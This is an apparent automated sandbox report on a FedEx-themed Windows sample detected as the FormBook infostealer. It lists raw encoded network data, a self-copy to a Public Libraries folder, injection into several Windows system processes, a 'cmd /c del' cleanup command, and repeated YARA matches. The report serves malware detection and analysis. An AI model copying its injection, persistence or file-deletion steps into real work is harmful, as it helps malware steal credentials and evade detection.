                                            2022-05-13 15:19:06 UTC640INData Raw: e4 71 24 9d 44 63 e8 48 f9 7c 91 a9 bb 86 08 a0 8a 3e 5d ee 64 6e 9a 36 8a 42 44 b7 e8 c2 f9 80 63 14 02 0d 01 e6 f6 f5 28 e2 17 a3 2a 8d 8a 3c 40 ec a4 07 8d d1 8a b0 4a 9a ea f6 2c d1 6b 97 9b 2a a3 a7 b5 af 3c e3 92 84 ab ea ea b1 d8 8d 77 a1 f3 b1 e4 a2 18 0f ff af b5 d0 8b 0e 61 38 3e eb 98 88 45 fa 35 88 ea be 90 95 a5 4e 39 63 ad 40 f1 7c f7 b3 ec a9 5f 4b b7 27 34 8d 3e f4 2a 4b 63 88 f2 01 30 c0 b0 89 0a a8 4f 7c f8 2e 0f ab c7 de 85 fd 45 b3 5d ab ab 58 4f d6 18 cb ff b1 3e 66 9f 6d f4 f6 b5 30 64 8c 8b f4 bb 96 36 d0 61 3c cc ba 6f 9b 19 40 f9 9d 81 03 f9 36 e2 fa 71 4e 05 ea ee 38 f4 f5 a2 ea f6 da 01 6b 8b a1 9b 5d f6 36 3e e9 88 2a 3f 03 ee 21 fd b1 77 69 17 75 3d 64 37 8a 86 a3 09 4d 38 36 f6 26 d7 f2 e2 f6 40 ea 40 52 5f 44 3d 50 fd 45 13
                                            Data Ascii: q$DcH|>]dn6BDc(*<@J,k*<wa8>E5N9c@|_K'4>*Kc0O|.E]XO>fm0d6a<o@6qN8k]6>*?!wiu=d7M86&@@R_D=PE
                                            2022-05-13 15:19:06 UTC656INData Raw: dd 42 98 01 ce 4e 67 b3 5d 5e c8 6d 65 8a 90 a7 0e 8a 3e 5d 40 20 6e 70 af 44 e3 89 71 2e 97 ee 0d a0 61 3c 5a ec 6f a5 22 06 8d dd 61 dc b3 44 bb 0f b9 8d 7b 11 68 91 d2 8d 8a 6c 24 28 19 b1 36 5a 1a 85 99 1e c3 f6 93 36 40 b7 d0 98 f7 40 3c b1 51 01 05 5b ee f6 e2 f7 07 b5 38 a9 b6 a2 28 58 a2 30 c1 11 40 42 78 56 71 20 95 2a 5f fb 70 ab 45 9d 38 b1 af d2 86 e1 b1 3e b7 ee d8 93 08 24 ef b1 01 8a b5 ec f4 4b a4 a3 cd a2 b4 c5 a2 e8 61 62 5f b9 e6 32 a3 94 05 3c 94 f1 24 38 f6 ad 9f 51 ec b5 cb 91 0e 1e 44 42 c5 07 10 e6 9b 44 d0 8b 15 8a 3e 40 7c d3 06 8b 2a 49 19 1c 80 40 c1 9a af a9 4e 2d f8 a3 a3 d2 5d ca ac 5e 05 af ee 7e 5e 0e ee 17 0f dc 1e 8d 48 5b ce ca 84 26 59 ee 51 b1 ac a2 18 41 ff af b5 5e 95 0e 44 9e 15 d4 3c 1a 17 1e 42 40 3c 15 d5 4a 19
                                            Data Ascii: BNg]^me>]@ npDq.a<Zo"aD{hl$(6Z6@@<Q[8(X0@BxVq *_pE8>$Kab_2<$8QDBD>@|*I@N-]^~^H[&YQA^D<B@<J
                                            2022-05-13 15:19:06 UTC672INData Raw: a2 43 94 36 3d d1 ff f6 b3 5d ab 7e f9 28 47 38 17 af 44 5c ec b5 b3 f4 f2 a0 46 1a ee 98 9e 40 09 80 5b c2 8a d6 b7 b5 67 75 db fb 69 de 8c 1a 18 44 f6 9a 5d 05 32 5a 59 83 fd c6 3d 45 f4 5f b1 a9 5b f4 03 38 ff 54 f6 ce 8e 40 38 8d e3 6b 2e d0 ad 54 c0 fd 91 e0 ea c7 be ff 93 d4 36 ee 21 01 1b e2 6f 8c 99 c1 94 40 3c f7 c6 71 a5 1e f4 ca 38 45 ec 38 a5 50 15 8e 28 b1 3e f7 d5 fa 8f 92 e0 15 46 86 44 b5 6c e5 83 a3 97 ea d0 3e e2 a7 61 e8 a3 54 e3 fd f6 b3 66 fa 02 58 a4 03 95 07 57 44 b7 6c 5e 6d 2a 32 af da 42 da 24 e8 44 1c c9 e1 17 3c 44 82 b3 12 58 15 fd 2e fd dc b3 44 7a 48 b9 97 16 ea d2 3e d4 b1 ee 1c d9 0d 19 1e 9c 62 a4 5d f6 7e 1c 7f 36 17 88 22 01 d0 b1 40 7a 04 89 8d 18 5b d2 ea d0 24 af b5 2c bb db a0 ad 5d 68 2f fa 77 86 8b a6 e2 b7 38 78
                                            Data Ascii: C6=]~(G8D\F@[guiD]2ZY=E_[8T@8k.T6!o@<q8E8P(>FDl>aTfXWDl^m*2B$D<DX.DzH>b]~6"@z[$,]h/w8x
                                            2022-05-13 15:19:06 UTC688INData Raw: bd fd 5e e8 b7 b7 2d b5 fd bf 99 ab de c9 8c ef 0f cc af b7 1b 69 6f 42 65 65 48 88 8a d6 95 61 b1 61 c3 6a dd 8f 44 b7 42 ec 51 c1 ae 2e 61 42 b1 a2 ea 90 38 07 97 1d 73 8b 5c 59 d3 1b d9 8f 77 ee 26 62 a4 65 88 88 36 f4 40 5b fa a7 94 9e 1c 40 af b1 09 6f 3c ee 5b 5f f6 bb af b5 38 b7 f6 e8 2e 59 19 56 8d 5f b3 a8 30 06 16 38 b5 73 b5 ca 62 da 56 31 44 cc 3a ec 38 24 3f c9 92 3c 86 b7 65 61 23 6f 95 05 f8 38 96 3b cb 55 ca 3b 10 a9 f6 47 2a 48 07 ee b1 77 70 85 22 18 4a fb 8b 38 cc af da ea fc 31 7d ca f6 af ad c3 f3 ff e8 44 4f 6c 10 2e 8f 44 b7 95 92 fb 92 b4 de 61 42 93 9e 8e 1b ee 3c aa bc b9 3e ec 3c 0a cf 9a 90 53 4e 92 5b 67 bc 05 fa 13 4b 3e 36 40 42 0e d1 05 3c c5 01 61 b5 9a 71 b9 a5 18 c6 af b5 38 b7 12 d1 01 65 d7 a2 b5 ea 83 04 fa 91 b7 38
                                            Data Ascii: ^-ioBeeHaajDBQ.aB8s\Yw&be6@[@o<[_8.YV_08sbV1D:8$?<ea#o8;U;G*Hwp"J81}DOl.DaB<><SN[gK>6@B<aq8e8
                                            2022-05-13 15:19:06 UTC704INData Raw: cb 3c f6 9f 22 86 01 5b 44 42 55 85 ab 38 b3 ab a9 38 32 9f fb bb 9d 97 b3 f4 34 2f f3 8c 52 de cc c9 2b 44 e8 61 af 44 b7 95 f6 86 4e 32 de 61 42 b3 24 2c c7 9a 2a 47 42 a0 3e ec 3c 0a bd 9a 9b 67 9a 90 ad 9c a5 13 4a 72 0c a6 80 a1 5e 8f 58 e4 e2 51 d6 61 b5 e6 72 9e 5f 22 48 ff b5 ab b6 66 10 20 a7 9b e8 d6 5f 40 22 20 7e 42 38 b7 1a 8a e5 9c ab 09 66 8b b1 b3 1e c9 72 fd 3e 44 8f 01 01 9c 42 52 09 38 b7 aa 2a 7f 5b 5d 42 ea e8 3e 9f 0d 9e 64 16 32 de 34 f6 b3 18 94 bf 03 8f 52 86 f4 3c c0 93 14 e6 20 f4 f6 a3 c1 fd 80 b7 d0 44 5d cc 25 89 20 44 b5 82 ee 6e 78 1e 61 61 db 68 76 78 1e ee af e6 28 66 88 ec b1 ec dd f2 c0 9e 4c 36 5b 32 9b 96 86 af f2 61 1d fa 22 34 e8 b1 40 78 8e 16 40 07 5b ee 67 0c 4e 07 8d 40 49 9a a7 5b 13 34 02 b9 d1 57 6b 86 4d 54
                                            Data Ascii: <"[DBU8824/R+DaDN2aB$,*GB><gJr^XQar_"Hf _@" ~B8fr>DBR8*[]B>d24R< D]% Dnxaahvx(fL6[2a"4@x@[gN@I[4WkMT
                                            2022-05-13 15:19:06 UTC720INData Raw: e8 3e 3c f6 61 e8 b7 b7 ee b1 f6 b3 5d ab 38 b3 ab a9 38 f4 af 44 b7 ec b5 b3 f4 f6 af 44 42 44 b7 e8 44 ea 44 e8 61 3c 44 b7 b5 ea b7 3c b3 61 61 42 b3 44 3c 40 ee af a9 ea ee 3e ec b1 ee ea f6 f4 5f b1 36 5b f4 5d f6 40 36 67 3e 36 40 ab ea e8 b1 40 3c ad 61 b5 a9 5b ee ea e8 b7 af b5 38 36 f6 e8 ad 5d e8 f6 40 5f 40 42 40 3c b7 38 b7 5f b1 f4 f6 38 5b ec 38 b1 b3 ec 38 5d b1 3e 44 ee 40 3e f4 36 a9 b5 38 44 b5 ec 67 5b 5d 42 ea e8 3e 3c f6 61 e8 b7 b7 ee b1 f6 b3 5d ab 38 b3 ab a9 38 f4 af 44 b7 ec b5 b3 f4 f6 af 44 42 44 b7 e8 44 ea 44 e8 61 3c 44 b7 b5 ea b7 3c b3 61 61 42 b3 44 3c 40 ee af a9 ea ee 3e ec b1 ee ea f6 f4 5f b1 36 5b f4 5d f6 40 36 67 3e 36 40 ab ea e8 b1 40 3c ad 61 b5 a9 5b ee ea e8 b7 af b5 38 36 f6 e8 ad 5d e8 f6 40 5f 40 42 40 3c
                                            Data Ascii: ><a]88DDBDDDa<D<aaBD<@>_6[]@6g>6@@<a[86]@_@B@<8_8[88]>D@>68Dg[]B><a]88DDBDDDa<D<aaBD<@>_6[]@6g>6@@<a[86]@_@B@<


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:17:18:25
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\FedEx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\FedEx.exe"
                                            Imagebase:0x400000
                                            File size:806912 bytes
                                            MD5 hash:917AA80E03E09B1D2B6619CC62CDBE22
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low

                                            General

                                            Target ID:8
                                            Start time:17:18:51
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\logagent.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\logagent.exe
                                            Imagebase:0xbc0000
                                            File size:86016 bytes
                                            MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:9
                                            Start time:17:18:55
                                            Start date:13/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff74fc70000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Target ID:12
                                            Start time:17:19:01
                                            Start date:13/05/2022
                                            Path:C:\Users\Public\Libraries\Rvsuben.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\Public\Libraries\Rvsuben.exe"
                                            Imagebase:0x400000
                                            File size:806912 bytes
                                            MD5 hash:917AA80E03E09B1D2B6619CC62CDBE22
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Antivirus matches:
                                            • Detection: 32%, Virustotal, Browse
                                            • Detection: 59%, ReversingLabs
                                            Reputation:low

                                            General

                                            Target ID:14
                                            Start time:17:19:10
                                            Start date:13/05/2022
                                            Path:C:\Users\Public\Libraries\Rvsuben.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\Public\Libraries\Rvsuben.exe"
                                            Imagebase:0x400000
                                            File size:806912 bytes
                                            MD5 hash:917AA80E03E09B1D2B6619CC62CDBE22
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Reputation:low

                                            General

                                            Target ID:20
                                            Start time:17:19:39
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\logagent.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\logagent.exe
                                            Imagebase:0xbc0000
                                            File size:86016 bytes
                                            MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:22
                                            Start time:17:19:48
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\DpiScaling.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\DpiScaling.exe
                                            Imagebase:0x7ff613fd0000
                                            File size:77312 bytes
                                            MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:23
                                            Start time:17:19:50
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\WWAHost.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                            Imagebase:0xf70000
                                            File size:829856 bytes
                                            MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:27
                                            Start time:17:20:01
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Windows\SysWOW64\logagent.exe"
                                            Imagebase:0x1100000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:28
                                            Start time:17:20:01
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                            Imagebase:0xab0000
                                            File size:831488 bytes
                                            MD5 hash:7FC345F685C2A58283872D851316ACC4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Target ID:29
                                            Start time:17:20:01
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmmon32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                            Imagebase:0xae0000
                                            File size:36864 bytes
                                            MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
